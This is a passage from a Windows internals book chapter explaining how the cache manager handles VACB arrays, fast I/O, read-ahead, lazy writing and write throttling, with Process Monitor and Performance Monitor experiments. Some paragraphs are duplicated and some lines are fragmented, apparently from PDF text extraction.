Entry 2
Entry 3
FIGURE 11-9 VACB index arrays.
As a further optimization, the VACB index array allocated from nonpaged pool becomes a sparse
multilevel index array if the file is larger than 32 MB, where each index array consists of 128 entries. You
can calculate the number of levels required for a file with the following formula:
(Number of bits required to represent file size – 18) / 7
Round up the result of the equation to the next whole number. The value 18 in the equation comes
from the fact that a VACB represents 256 KB, and 256 KB is 2^18. The value 7 comes from the fact that
each level in the array has 128 entries and 2^7 is 128. Thus, a file that has a size that is the maximum that
can be described with 63 bits (the largest size the cache manager supports) would require only seven
levels. The array is sparse because the only branches that the cache manager allocates are ones for
which there are active views at the lowest-level index array. Figure 11-10 shows an example of a multi-
level VACB array for a sparse file that is large enough to require three levels.
582
CHAPTER 11 Caching and file systems
VACB
Shared
cache map
Pointer to
additional VACB
index array
0
127
0
127
0
127
0
127
0
127
0
127
VACB
VACB
FIGURE 11-10 Multilevel VACB arrays.
This scheme is required to efficiently handle sparse files that might have extremely large file sizes
with only a small fraction of valid data because only enough of the array is allocated to handle the
currently mapped views of a file. For example, a 32-GB sparse file for which only 256 KB is mapped into
the cache’s virtual address space would require a VACB array with three allocated index arrays because
only one branch of the array has a mapping and a 32-GB file requires a three-level array. If the cache
manager didn’t use the multilevel VACB index array optimization for this file, it would have to allocate
a VACB index array with 128,000 entries, or the equivalent of 1,000 VACB index arrays.
File system interfaces
The first time a file’s data is accessed for a cached read or write operation, the file system driver is
responsible for determining whether some part of the file is mapped in the system cache. If it’s not,
the file system driver must call the CcInitializeCacheMap function to set up the per-file data structures
described in the preceding section.
CHAPTER 11 Caching and file systems
583
Once a file is set up for cached access, the file system driver calls one of several functions to access
the data in the file. There are three primary methods for accessing cached data, each intended for a
specific situation:
I
The copy method copies user data between cache buffers in system space and a process buffer
in user space.
I
The mapping and pinning method uses virtual addresses to read and write data directly from
and to cache buffers.
I
The physical memory access method uses physical addresses to read and write data directly
from and to cache buffers.
File system drivers must provide two versions of the file read operation—cached and noncached—
to prevent an infinite loop when the memory manager processes a page fault. When the memory
manager resolves a page fault by calling the file system to retrieve data from the file (via the device
driver, of course), it must specify this as a paging read operation by setting the “no cache” and “paging
IO” flags in the IRP.
Figure 11-11 illustrates the typical interactions between the cache manager, the memory man-
ager, and file system drivers in response to user read or write file I/O. The cache manager is invoked
by a file system through the copy interfaces (the CcCopyRead and CcCopyWrite paths). To process a
CcFastCopyRead or CcCopyRead read, for example, the cache manager creates a view in the cache to
map a portion of the file being read and reads the file data into the user buffer by copying from the
view. The copy operation generates page faults as it accesses each previously invalid page in the view,
and in response the memory manager initiates noncached I/O into the file system driver to retrieve the
data corresponding to the part of the file mapped to the page that faulted.
MmFlushSection
File system
driver
Storage
device
driver
Cache
manager
Lazy writer
Read-ahead
Virtual
memory
manager
Page fault
handler
Modified and
mapped page
writer
Page fault
Page fault
NtCreateSection
MmCreateSection
CcCopyRead
CcCopyWrite
FastloRead, FastloWrite
loPageRead
loAsynchronousPageWrite
NtReadFile/NtWriteFile
IRP
Noncached
and paging I/O
CcFastCopyRead
CcFastCopyWrite
FIGURE 11-11 File system interaction with cache and memory managers.
The next three sections explain these cache access mechanisms, their purpose, and how they’re used.
584
CHAPTER 11 Caching and file systems
Copying to and from the cache
Because the system cache is in system space, it’s mapped into the address space of every process. As
with all system space pages, however, cache pages aren’t accessible from user mode because that
would be a potential security hole. (For example, a process might not have the rights to read a file
whose data is currently contained in some part of the system cache.) Thus, user application file reads
and writes to cached files must be serviced by kernel-mode routines that copy data between the
cache’s buffers in system space and the application’s buffers residing in the process address space.
Caching with the mapping and pinning interfaces
Just as user applications read and write data in files on a disk, file system drivers need to read and write
the data that describes the files themselves (the metadata, or volume structure data). Because the file
system drivers run in kernel mode, however, they could, if the cache manager were properly informed,
modify data directly in the system cache. To permit this optimization, the cache manager provides
functions that permit the file system drivers to find where in virtual memory the file system metadata
resides, thus allowing direct modification without the use of intermediary buffers.
If a file system driver needs to read file system metadata in the cache, it calls the cache manager’s
mapping interface to obtain the virtual address of the desired data. The cache manager touches all the
requested pages to bring them into memory and then returns control to the file system driver. The file
system driver can then access the data directly.
If the file system driver needs to modify cache pages, it calls the cache manager’s pinning services,
which keep the pages active in virtual memory so that they can’t be reclaimed. The pages aren’t actu-
ally locked into memory (such as when a device driver locks pages for direct memory access transfers).
Most of the time, a file system driver will mark its metadata stream as no write, which instructs the
memory manager’s mapped page writer (explained in Chapter 5 of Part 1) to not write the pages to
disk until explicitly told to do so. When the file system driver unpins (releases) them, the cache manager
releases its resources so that it can lazily flush any changes to disk and release the cache view that the
metadata occupied.
The mapping and pinning interfaces solve one thorny problem of implementing a file system: buffer
management. Without directly manipulating cached metadata, a file system must predict the maxi-
mum number of buffers it will need when updating a volume’s structure. By allowing the file system to
access and update its metadata directly in the cache, the cache manager eliminates the need for buf-
fers, simply updating the volume structure in the virtual memory the memory manager provides. The
only limitation the file system encounters is the amount of available memory.
Caching with the direct memory access interfaces
In addition to the mapping and pinning interfaces used to access metadata directly in the cache, the
cache manager provides a third interface to cached data: direct memory access (DMA). The DMA
functions are used to read from or write to cache pages without intervening buffers, such as when a
network file system is doing a transfer over the network.
CHAPTER 11 Caching and file systems
585
The DMA interface returns to the file system the physical addresses of cached user data (rather than
the virtual addresses, which the mapping and pinning interfaces return), which can then be used to
transfer data directly from physical memory to a network device. Although small amounts of data (1 KB
to 2 KB) can use the usual buffer-based copying interfaces, for larger transfers the DMA interface can
result in significant performance improvements for a network server processing file requests from re-
mote systems. To describe these references to physical memory, a memory descriptor list (MDL) is used.
(MDLs are introduced in Chapter 5 of Part 1.)
Fast I/O
Whenever possible, reads and writes to cached files are handled by a high-speed mechanism named
fast I/O. Fast I/O is a means of reading or writing a cached file without going through the work of
generating an IRP. With fast I/O, the I/O manager calls the file system driver’s fast I/O routine to see
whether I/O can be satisfied directly from the cache manager without generating an IRP.
Because the cache manager is architected on top of the virtual memory subsystem, file system driv-
ers can use the cache manager to access file data simply by copying to or from pages mapped to the
actual file being referenced without going through the overhead of generating an IRP.
Fast I/O doesn’t always occur. For example, the first read or write to a file requires setting up the
file for caching (mapping the file into the cache and setting up the cache data structures, as explained
earlier in the section “Cache data structures”). Also, if the caller specified an asynchronous read or write,
fast I/O isn’t used because the caller might be stalled during paging I/O operations required to satisfy
the buffer copy to or from the system cache and thus not really providing the requested asynchronous
I/O operation. But even on a synchronous I/O operation, the file system driver might decide that it can’t
process the I/O operation by using the fast I/O mechanism—say, for example, if the file in question has
a locked range of bytes (as a result of calls to the Windows LockFile and UnlockFile functions). Because
the cache manager doesn’t know what parts of which files are locked, the file system driver must check
the validity of the read or write, which requires generating an IRP. The decision tree for fast I/O is
shown in Figure 11-12.
These steps are involved in servicing a read or a write with fast I/O:
1.
A thread performs a read or write operation.
2.
If the file is cached and the I/O is synchronous, the request passes to the fast I/O entry point of
the file system driver stack. If the file isn’t cached, the file system driver sets up the file for cach-
ing so that the next time, fast I/O can be used to satisfy a read or write request.
3.
If the file system driver’s fast I/O routine determines that fast I/O is possible, it calls the cache
manager’s read or write routine to access the file data directly in the cache. (If fast I/O isn’t pos-
sible, the file system driver returns to the I/O system, which then generates an IRP for the I/O
and eventually calls the file system’s regular read routine.)
4.
The cache manager translates the supplied file offset into a virtual address in the cache.
586
CHAPTER 11 Caching and file systems
5.
For reads, the cache manager copies the data from the cache into the buffer of the process
requesting it; for writes, it copies the data from the buffer to the cache.
6.
One of the following actions occurs:
• For reads where FILE_FLAG_RANDOM_ACCESS wasn’t specified when the file was opened,
the read-ahead information in the caller’s private cache map is updated. Read-ahead may
also be queued for files for which the FO_RANDOM_ACCESS flag is not specified.
• For writes, the dirty bit of any modified page in the cache is set so that the lazy writer will
know to flush it to disk.
• For write-through files, any modifications are flushed to disk.
No
Generate IRP
NtReadFile
Synchronize
and cached
data?
Fast I/O
possible?
Is file cached?
Cache manager
copies data to or
from process buffer
Cache manager
initializes cache
Cache complete
Yes
No
No
Yes
Yes
File system driver
Cache manager
Is Synchronous?
Return pending
Yes
No
Is Synchronous?
No
Yes
FIGURE 11-12 Fast I/O decision tree.
Read-ahead and write-behind
In this section, you’ll see how the cache manager implements reading and writing file data on behalf of
file system drivers. Keep in mind that the cache manager is involved in file I/O only when a file is opened
without the FILE_FLAG_NO_BUFFERING flag and then read from or written to using the Windows I/O
CHAPTER 11 Caching and file systems
587
functions (for example, using the Windows ReadFile and WriteFile functions). Mapped files don’t go
through the cache manager, nor do files opened with the FILE_FLAG_NO_BUFFERING flag set.
Note When an application uses the FILE_FLAG_NO_BUFFERING flag to open a file, its file I/O
must start at device-aligned offsets and be of sizes that are a multiple of the alignment size;
its input and output buffers must also be device-aligned virtual addresses. For file systems,
this usually corresponds to the sector size (4,096 bytes on NTFS, typically, and 2,048 bytes on
CDFS). One of the benefits of the cache manager, apart from the actual caching performance,
is the fact that it performs intermediate buffering to allow arbitrarily aligned and sized I/O.
Intelligent read-ahead
The cache manager uses the principle of spatial locality to perform intelligent read-ahead by predicting
what data the calling process is likely to read next based on the data that it’s reading currently. Because
the system cache is based on virtual addresses, which are contiguous for a particular file, it doesn’t
matter whether they’re juxtaposed in physical memory. File read-ahead for logical block caching is
more complex and requires tight cooperation between file system drivers and the block cache because
that cache system is based on the relative positions of the accessed data on the disk, and, of course,
files aren’t necessarily stored contiguously on disk. You can examine read-ahead activity by using the
Cache: Read Aheads/sec performance counter or the CcReadAheadIos system variable.
Reading the next block of a file that is being accessed sequentially provides an obvious performance
improvement, with the disadvantage that it will cause head seeks. To extend read-ahead benefits to
cases of stridden data accesses (both forward and backward through a file), the cache manager main-
tains a history of the last two read requests in the private cache map for the file handle being accessed,
a method known as asynchronous read-ahead with history. If a pattern can be determined from the
caller’s apparently random reads, the cache manager extrapolates it. For example, if the caller reads
page 4,000 and then page 3,000, the cache manager assumes that the next page the caller will require
is page 2,000 and prereads it.
Note Although a caller must issue a minimum of three read operations to establish a pre-
dictable sequence, only two are stored in the private cache map.
To make read-ahead even more efficient, the Win32 CreateFile function provides a flag indicating
forward sequential file access: FILE_FLAG_SEQUENTIAL_SCAN. If this flag is set, the cache manager
doesn’t keep a read history for the caller for prediction but instead performs sequential read-ahead.
However, as the file is read into the cache’s working set, the cache manager unmaps views of the file
that are no longer active and, if they are unmodified, directs the memory manager to place the pages
belonging to the unmapped views at the front of the standby list so that they will be quickly reused. It
also reads ahead two times as much data (2 MB instead of 1 MB, for example). As the caller continues
reading, the cache manager prereads additional blocks of data, always staying about one read (of the
size of the current read) ahead of the caller.
588
CHAPTER 11 Caching and file systems
The cache manager’s read-ahead is asynchronous because it’s performed in a thread separate
from the caller’s thread and proceeds concurrently with the caller’s execution. When called to re-
trieve cached data, the cache manager first accesses the requested virtual page to satisfy the request
and then queues an additional I/O request to retrieve additional data to a system worker thread. The
worker thread then executes in the background, reading additional data in anticipation of the caller’s
next read request. The preread pages are faulted into memory while the program continues executing
so that when the caller requests the data it’s already in memory.
For applications that have no predictable read pattern, the FILE_FLAG_RANDOM_ACCESS flag can
be specified when the CreateFile function is called. This flag instructs the cache manager not to attempt
to predict where the application is reading next and thus disables read-ahead. The flag also stops the
cache manager from aggressively unmapping views of the file as the file is accessed so as to minimize
the mapping/unmapping activity for the file when the application revisits portions of the file.
Read-ahead enhancements
Windows 8.1 introduced some enhancements to the cache manager read-ahead functionality. File system
drivers and network redirectors can decide the size and growth for the intelligent read-ahead with the
CcSetReadAheadGranularityEx API function. The cache manager client can decide the following:
I
Read-ahead granularity Sets the minimum read-ahead unit size and the end file-offset of
the next read-ahead. The cache manager sets the default granularity to 4 Kbytes (the size of a
memory page), but every file system sets this value in a different way (NTFS, for example, sets
the cache granularity to 64 Kbytes).
Figure 11-13 shows an example of read-ahead on a 200 Kbyte-sized file, where the cache granu-
larity has been set to 64 KB. If the user requests a nonaligned 1 KB read at offset 0x10800, and
if a sequential read has already been detected, the intelligent read-ahead will emit an I/O that
encompasses the 64 KB of data from offset 0x10000 to 0x20000. If there were already more
than two sequential reads, the cache manager emits another supplementary read from offset
0x20000 to offset 0x30000 (192 Kbytes).
FIGURE 11-13 Read-ahead on a 200 KB file, with granularity set to 64KB.
I
Pipeline size For some remote file system drivers, it may make sense to split large read-ahead I/
Os into smaller chunks, which will be emitted in parallel by the cache manager worker threads. A
network file system can achieve a substantial better throughput using this technique.
CHAPTER 11 Caching and file systems
589
I
Read-ahead aggressiveness File system drivers can specify the percentage used by the
cache manager to decide how to increase the read-ahead size after the detection of a third se-
quential read. For example, let’s assume that an application is reading a big file using a 1 Mbyte
I/O size. After the tenth read, the application has already read 10 Mbytes (the cache manager
may have already prefetched some of them). The intelligent read-ahead now decides by how
much to grow the read-ahead I/O size. If the file system has specified 60% of growth, the for-
mula used is the following:
(Number of sequential reads * Size of last read) * (Growth percentage / 100)
So, this means that the next read-ahead size is 6 MB (instead of being 2 MB, assuming that the
granularity is 64 KB and the I/O size is 1 MB). The default growth percentage is 50% if not modi-
fied by any cache manager client.
Write-back caching and lazy writing
The cache manager implements a write-back cache with lazy write. This means that data written to
files is first stored in memory in cache pages and then written to disk later. Thus, write operations are
allowed to accumulate for a short time and are then flushed to disk all at once, reducing the overall
number of disk I/O operations.
The cache manager must explicitly call the memory manager to flush cache pages because other-
wise the memory manager writes memory contents to disk only when demand for physical memory
exceeds supply, as is appropriate for volatile data. Cached file data, however, represents nonvolatile
disk data. If a process modifies cached data, the user expects the contents to be reflected on disk in a
timely manner.
Additionally, the cache manager has the ability to veto the memory manager’s mapped writer
thread. Since the modified list (see Chapter 5 of Part 1 for more information) is not sorted in logical
block address (LBA) order, the cache manager’s attempts to cluster pages for larger sequential I/Os to
the disk are not always successful and actually cause repeated seeks. To combat this effect, the cache
manager has the ability to aggressively veto the mapped writer thread and stream out writes in virtual
byte offset (VBO) order, which is much closer to the LBA order on disk. Since the cache manager now
owns these writes, it can also apply its own scheduling and throttling algorithms to prefer read-ahead
over write-behind and impact the system less.
The decision about how often to flush the cache is an important one. If the cache is flushed too
frequently, system performance will be slowed by unnecessary I/O. If the cache is flushed too rarely,
you risk losing modified file data in the cases of a system failure (a loss especially irritating to users
who know that they asked the application to save the changes) and running out of physical memory
(because it’s being used by an excess of modified pages).
590
CHAPTER 11 Caching and file systems
To balance these concerns, the cache manager’s lazy writer scan function executes on a system
worker thread once per second. The lazy writer scan has different duties:
I
Checks the number of average available pages and dirty pages (that belongs to the current
partition) and updates the dirty page threshold’s bottom and the top limits accordingly. The
threshold itself is updated too, primarily based on the total number of dirty pages written in the
previous cycle (see the following paragraphs for further details). It sleeps if there are no dirty
pages to write.
I
Calculates the number of dirty pages to write to disk through the CcCalculatePagesToWrite in-
ternal routine. If the number of dirty pages is more than 256 (1 MB of data), the cache manager
queues one-eighth of the total dirty pages to be flushed to disk. If the rate at which dirty pages
are being produced is greater than the amount the lazy writer had determined it should write,
the lazy writer writes an additional number of dirty pages that it calculates are necessary to
match that rate.
I
Cycles between each shared cache map (which are stored in a linked list belonging to the cur-
rent partition), and, using the internal CcShouldLazyWriteCacheMap routine, determines if the
current file described by the shared cache map needs to be flushed to disk. There are different
reasons why a file shouldn’t be flushed to disk: for example, an I/O could have been already
initialized by another thread, the file could be a temporary file, or, more simply, the cache map
might not have any dirty pages. In case the routine determined that the file should be flushed
out, the lazy writer scan checks whether there are still enough available pages to write, and, if
so, posts a work item to the cache manager system worker threads.
Note The lazy writer scan uses some exceptions while deciding the number of dirty pages
mapped by a particular shared cache map to write (it doesn’t always write all the dirty pages
of a file): If the target file is a metadata stream with more than 256 KB of dirty pages, the cache
manager writes only one-eighth of its total pages. Another exception is used for files that have
more dirty pages than the total number of pages that the lazy writer scan can flush.
Lazy writer system worker threads from the systemwide critical worker thread pool actually perform
the I/O operations. The lazy writer is also aware of when the memory manager’s mapped page writer
is already performing a flush. In these cases, it delays its write-back capabilities to the same stream to
avoid a situation where two flushers are writing to the same file.
Note The cache manager provides a means for file system drivers to track when and how
much data has been written to a file. After the lazy writer flushes dirty pages to the disk,
the cache manager notifies the file system, instructing it to update its view of the valid data
length for the file. (The cache manager and file systems separately track in memory the valid
data length for a file.)
CHAPTER 11 Caching and file systems
591
EXPERIMENT: Watching the cache manager in action
In this experiment, we use Process Monitor to view the underlying file system activity, including
cache manager read-ahead and write-behind, when Windows Explorer copies a large file (in this
example, a DVD image) from one local directory to another.
First, configure Process Monitor’s filter to include the source and destination file paths, the
Explorer.exe and System processes, and the ReadFile and WriteFile operations. In this example,
the C:\Users\Andrea\Documents\Windows_10_RS3.iso file was copied to C:\ISOs\ Windows_10_
RS3.iso, so the filter is configured as follows:
You should see a Process Monitor trace like the one shown here after you copy the file:
The first few entries show the initial I/O processing performed by the copy engine and the first
cache manager operations. Here are some of the things that you can see:
I
The initial 1 MB cached read from Explorer at the first entry. The size of this read depends on an
internal matrix calculation based on the file size and can vary from 128 KB to 1 MB. Because this
file was large, the copy engine chose 1 MB.
EXPERIMENT: Watching the cache manager in action
In this experiment, we use Process Monitor to view the underlying file system activity, including
cache manager read-ahead and write-behind, when Windows Explorer copies a large file (in this
example, a DVD image) from one local directory to another.
First, configure Process Monitor’s filter to include the source and destination file paths, the
Explorer.exe and System processes, and the ReadFile and WriteFile operations. In this example,
the C:\Users\Andrea\Documents\Windows_10_RS3.iso file was copied to C:\ISOs\ Windows_10_
RS3.iso, so the filter is configured as follows:
You should see a Process Monitor trace like the one shown here after you copy the file:
The first few entries show the initial I/O processing performed by the copy engine and the first
cache manager operations. Here are some of the things that you can see:
I
The initial 1 MB cached read from Explorer at the first entry. The size of this read depends on an
internal matrix calculation based on the file size and can vary from 128 KB to 1 MB. Because this
file was large, the copy engine chose 1 MB.
592
CHAPTER 11 Caching and file systems
I
The 1-MB read is followed by another 1-MB noncached read. Noncached reads typically indi-
cate activity due to page faults or cache manager access. A closer look at the stack trace for
these events, which you can see by double-clicking an entry and choosing the Stack tab, reveals
that indeed the CcCopyRead cache manager routine, which is called by the NTFS driver’s read
routine, causes the memory manager to fault the source data into physical memory:
I
After this 1-MB page fault I/O, the cache manager’s read-ahead mechanism starts reading the
file, which includes the System process’s subsequent noncached 1-MB read at the 1-MB offset.
Because of the file size and Explorer’s read I/O sizes, the cache manager chose 1 MB as the
optimal read-ahead size. The stack trace for one of the read-ahead operations, shown next,
confirms that one of the cache manager’s worker threads is performing the read-ahead.
I
The 1-MB read is followed by another 1-MB noncached read. Noncached reads typically indi-
cate activity due to page faults or cache manager access. A closer look at the stack trace for
these events, which you can see by double-clicking an entry and choosing the Stack tab, reveals
that indeed the CcCopyRead cache manager routine, which is called by the NTFS driver’s read
CcCopyRead cache manager routine, which is called by the NTFS driver’s read
CcCopyRead
routine, causes the memory manager to fault the source data into physical memory:
I
After this 1-MB page fault I/O, the cache manager’s read-ahead mechanism starts reading the
file, which includes the System process’s subsequent noncached 1-MB read at the 1-MB offset.
Because of the file size and Explorer’s read I/O sizes, the cache manager chose 1 MB as the
optimal read-ahead size. The stack trace for one of the read-ahead operations, shown next,
confirms that one of the cache manager’s worker threads is performing the read-ahead.
CHAPTER 11 Caching and file systems
593
After this point, Explorer’s 1-MB reads aren’t followed by page faults, because the read-ahead
thread stays ahead of Explorer, prefetching the file data with its 1-MB noncached reads. However,
every once in a while, the read-ahead thread is not able to pick up enough data in time, and
clustered page faults do occur, which appear as Synchronous Paging I/O.
If you look at the stack for these entries, you’ll see that instead of MmPrefetchForCacheManager,
the MmAccessFault/MiIssueHardFault routines are called.
As soon as it starts reading, Explorer also starts performing writes to the destination file.
These are sequential, cached 1-MB writes. After about 124 MB of reads, the first WriteFile opera-
tion from the System process occurs, shown here:
The write operation’s stack trace, shown here, indicates that the memory manager’s mapped
page writer thread was actually responsible for the write. This occurs because for the first couple
of megabytes of data, the cache manager hadn’t started performing write-behind, so the
memory manager’s mapped page writer began flushing the modified destination file data. (See
Chapter 10 for more information on the mapped page writer.)
After this point, Explorer’s 1-MB reads aren’t followed by page faults, because the read-ahead
thread stays ahead of Explorer, prefetching the file data with its 1-MB noncached reads. However,
every once in a while, the read-ahead thread is not able to pick up enough data in time, and
clustered page faults do occur, which appear as Synchronous Paging I/O.
If you look at the stack for these entries, you’ll see that instead of MmPrefetchForCacheManager,
MmPrefetchForCacheManager,
MmPrefetchForCacheManager
the MmAccessFault/
MmAccessFault/
MmAccessFault MiIssueHardFault
/MiIssueHardFault
/
routines are called.
MiIssueHardFault routines are called.
MiIssueHardFault
As soon as it starts reading, Explorer also starts performing writes to the destination file.
These are sequential, cached 1-MB writes. After about 124 MB of reads, the first WriteFile opera-
tion from the System process occurs, shown here:
The write operation’s stack trace, shown here, indicates that the memory manager’s mapped
page writer thread was actually responsible for the write. This occurs because for the first couple
page writer thread was actually responsible for the write. This occurs because for the first couple
page writer
of megabytes of data, the cache manager hadn’t started performing write-behind, so the
memory manager’s mapped page writer began flushing the modified destination file data. (See
Chapter 10 for more information on the mapped page writer.)
594
CHAPTER 11 Caching and file systems
To get a clearer view of the cache manager operations, remove Explorer from the Process
Monitor’s filter so that only the System process operations are visible, as shown next.
With this view, it’s much easier to see the cache manager’s 1-MB write-behind operations
(the maximum write sizes are 1 MB on client versions of Windows and 32 MB on server versions;
this experiment was performed on a client system). The stack trace for one of the write-behind
operations, shown here, verifies that a cache manager worker thread is performing write-behind:
As an added experiment, try repeating this process with a remote copy instead (from one
Windows system to another) and by copying files of varying sizes. You’ll notice some different
behaviors by the copy engine and the cache manager, both on the receiving and sending sides.
To get a clearer view of the cache manager operations, remove Explorer from the Process
Monitor’s filter so that only the System process operations are visible, as shown next.
With this view, it’s much easier to see the cache manager’s 1-MB write-behind operations
(the maximum write sizes are 1 MB on client versions of Windows and 32 MB on server versions;
this experiment was performed on a client system). The stack trace for one of the write-behind
operations, shown here, verifies that a cache manager worker thread is performing write-behind:
As an added experiment, try repeating this process with a remote copy instead (from one
Windows system to another) and by copying files of varying sizes. You’ll notice some different
behaviors by the copy engine and the cache manager, both on the receiving and sending sides.
CHAPTER 11 Caching and file systems
595
Disabling lazy writing for a file
If you create a temporary file by specifying the flag FILE_ATTRIBUTE_TEMPORARY in a call to the
Windows CreateFile function, the lazy writer won’t write dirty pages to the disk unless there is a se-
vere shortage of physical memory or the file is explicitly flushed. This characteristic of the lazy writer
improves system performance—the lazy writer doesn’t immediately write data to a disk that might
ultimately be discarded. Applications usually delete temporary files soon after closing them.
Forcing the cache to write through to disk
Because some applications can’t tolerate even momentary delays between writing a file and seeing
the updates on disk, the cache manager also supports write-through caching on a per-file object basis;
changes are written to disk as soon as they’re made. To turn on write-through caching, set the FILE_
FLAG_WRITE_THROUGH flag in the call to the CreateFile function. Alternatively, a thread can explicitly
flush an open file by using the Windows FlushFileBuffers function when it reaches a point at which the
data needs to be written to disk.
Flushing mapped files
If the lazy writer must write data to disk from a view that’s also mapped into another process’s address
space, the situation becomes a little more complicated because the cache manager will only know
about the pages it has modified. (Pages modified by another process are known only to that process
because the modified bit in the page table entries for modified pages is kept in the process private
page tables.) To address this situation, the memory manager informs the cache manager when a user
maps a file. When such a file is flushed in the cache (for example, as a result of a call to the Windows
FlushFileBuffers function), the cache manager writes the dirty pages in the cache and then checks to
see whether the file is also mapped by another process. When the cache manager sees that the file is
also mapped by another process, the cache manager then flushes the entire view of the section to write
out pages that the second process might have modified. If a user maps a view of a file that is also open
in the cache, when the view is unmapped, the modified pages are marked as dirty so that when the lazy
writer thread later flushes the view, those dirty pages will be written to disk. This procedure works as
long as the sequence occurs in the following order:
1.
A user unmaps the view.
2.
A process flushes file buffers.
If this sequence isn’t followed, you can’t predict which pages will be written to disk.
596
CHAPTER 11 Caching and file systems
EXPERIMENT: Watching cache flushes
You can see the cache manager map views into the system cache and flush pages to disk by
running the Performance Monitor and adding the Data Maps/sec and Lazy Write Flushes/sec
counters. (You can find these counters under the “Cache” group.) Then, copy a large file from one
location to another. The generally higher line in the following screenshot shows Data Maps/sec,
and the other shows Lazy Write Flushes/sec. During the file copy, Lazy Write Flushes/sec signifi-
cantly increased.
Write throttling
The file system and cache manager must determine whether a cached write request will affect sys-
tem performance and then schedule any delayed writes. First, the file system asks the cache manager
whether a certain number of bytes can be written right now without hurting performance by using the
CcCanIWrite function and blocking that write if necessary. For asynchronous I/O, the file system sets up
a callback with the cache manager for automatically writing the bytes when writes are again permitted
by calling CcDeferWrite. Otherwise, it just blocks and waits on CcCanIWrite to continue. Once it’s noti-
fied of an impending write operation, the cache manager determines how many dirty pages are in the
cache and how much physical memory is available. If few physical pages are free, the cache manager
momentarily blocks the file system thread that’s requesting to write data to the cache. The cache man-
ager’s lazy writer flushes some of the dirty pages to disk and then allows the blocked file system thread
to continue. This write throttling prevents system performance from degrading because of a lack of
memory when a file system or network server issues a large write operation.
EXPERIMENT: Watching cache flushes
You can see the cache manager map views into the system cache and flush pages to disk by
running the Performance Monitor and adding the Data Maps/sec and Lazy Write Flushes/sec
counters. (You can find these counters under the “Cache” group.) Then, copy a large file from one
location to another. The generally higher line in the following screenshot shows Data Maps/sec,
and the other shows Lazy Write Flushes/sec. During the file copy, Lazy Write Flushes/sec signifi-
cantly increased.
CHAPTER 11 Caching and file systems
597
Note The effects of write throttling are volume-aware, such that if a user is copying a large
file on, say, a RAID-0 SSD while also transferring a document to a portable USB thumb drive,
writes to the USB disk will not cause write throttling to occur on the SSD transfer.
The dirty page threshold is the number of pages that the system cache will allow to be dirty before
throttling cached writers. This value is computed when the cache manager partition is initialized (the
system partition is created and initialized at phase 1 of the NT kernel startup) and depends on the
product type (client or server). As seen in the previous paragraphs, two other values are also com-
puted—the top dirty page threshold and the bottom dirty page threshold. Depending on memory
consumption and the rate at which dirty pages are being processed, the lazy writer scan calls the
internal function CcAdjustThrottle, which, on server systems, performs dynamic adjustment of the cur-
rent threshold based on the calculated top and bottom values. This adjustment is made to preserve the
read cache in cases of a heavy write load that will inevitably overrun the cache and become throttled.
Table 11-1 lists the algorithms used to calculate the dirty page thresholds.
TABLE 11-1 Algorithms for calculating the dirty page thresholds
Product Type
Dirty Page Threshold
Top Dirty Page Threshold
Bottom Dirty Page Threshold
Client
Physical pages / 8
Physical pages / 8
Physical pages / 8
Server
Physical pages / 2
Physical pages / 2
Physical pages / 8
Write throttling is also useful for network redirectors transmitting data over slow communica-
tion lines. For example, suppose a local process writes a large amount of data to a remote file system
over a slow 640 Kbps line. The data isn’t written to the remote disk until the cache manager’s lazy
writer flushes the cache. If the redirector has accumulated lots of dirty pages that are flushed to disk
at once, the recipient could receive a network timeout before the data transfer completes. By using
the CcSetDirtyPageThreshold function, the cache manager allows network redirectors to set a limit on
the number of dirty cache pages they can tolerate (for each stream), thus preventing this scenario. By
limiting the number of dirty pages, the redirector ensures that a cache flush operation won’t cause a
network timeout.
System threads
As mentioned earlier, the cache manager performs lazy write and read-ahead I/O operations by
submitting requests to the common critical system worker thread pool. However, it does limit the use
of these threads to one less than the total number of critical system worker threads. In client systems,
there are 5 total critical system worker threads, whereas in server systems there are 10.
Internally, the cache manager organizes its work requests into four lists (though these are serviced
by the same set of executive worker threads):
I
The express queue is used for read-ahead operations.
I
The regular queue is used for lazy write scans (for dirty data to flush), write-behinds, and
lazy closes.
598
CHAPTER 11 Caching and file systems
I
The fast teardown queue is used when the memory manager is waiting for the data section
owned by the cache manager to be freed so that the file can be opened with an image section
instead, which causes CcWriteBehind to flush the entire file and tear down the shared cache map.
I
The post tick queue is used for the cache manager to internally register for a notification after
each “tick” of the lazy writer thread—in other words, at the end of each pass.
To keep track of the work items the worker threads need to perform, the cache manager creates
its own internal per-processor look-aside list—a fixed-length list (one for each processor) of worker
queue item structures. (Look-aside lists are discussed in Chapter 5 of Part 1.) The number of worker
queue items depends on system type: 128 for client systems, and 256 for server systems. For cross-
processor performance, the cache manager also allocates a global look-aside list at the same sizes as
just described.
Aggressive write behind and low-priority lazy writes
With the goal of improving cache manager performance, and to achieve compatibility with low-speed
disk devices (like eMMC disks), the cache manager lazy writer has gone through substantial improve-
ments in Windows 8.1 and later.
As seen in the previous paragraphs, the lazy writer scan adjusts the dirty page threshold and its
top and bottom limits. Multiple adjustments are made on the limits, by analyzing the history of the
total number of available pages. Other adjustments are performed to the dirty page threshold itself
by checking whether the lazy writer has been able to write the expected total number of pages in the
last execution cycle (one per second). If the total number of written pages in the last cycle is less than
the expected number (calculated by the CcCalculatePagesToWrite routine), it means that the underly-
ing disk device was not able to support the generated I/O throughput, so the dirty page threshold is
lowered (this means that more I/O throttling is performed, and some cache manager clients will wait
when calling CcCanIWrite API). In the opposite case, in which there are no remaining pages from the
last cycle, the lazy writer scan can easily raise the threshold. In both cases, the threshold needs to stay
inside the range described by the bottom and top limits.
The biggest improvement has been made thanks to the Extra Write Behind worker threads. In server
SKUs, the maximum number of these threads is nine (which corresponds to the total number of critical
system worker threads minus one), while in client editions it is only one. When a system lazy write scan
is requested by the cache manager, the system checks whether dirty pages are contributing to memory
pressure (using a simple formula that verifies that the number of dirty pages are less than a quarter of
the dirty page threshold, and less than half of the available pages). If so, the systemwide cache manager
thread pool routine (CcWorkerThread) uses a complex algorithm that determines whether it can add
another lazy writer thread that will write dirty pages to disk in parallel with the others.
To correctly understand whether it is possible to add another thread that will emit additional I/Os,
without getting worse system performance, the cache manager calculates the disk throughput of
the old lazy write cycles and keeps track of their performance. If the throughput of the current cycles
is equal or better than the previous one, it means that the disk can support the overall I/O level, so
it makes sense to add another lazy writer thread (which is called an Extra Write Behind thread in this
CHAPTER 11 Caching and file systems
599
case). If, on the other hand, the current throughput is lower than the previous cycle, it means that the
underlying disk is not able to sustain additional parallel writes, so the Extra Write Behind thread is
removed. This feature is called Aggressive Write Behind.
In Windows client editions, the cache manager enables an optimization designed to deal with low-
speed disks. When a lazy writer scan is requested, and when the file system drivers write to the cache,
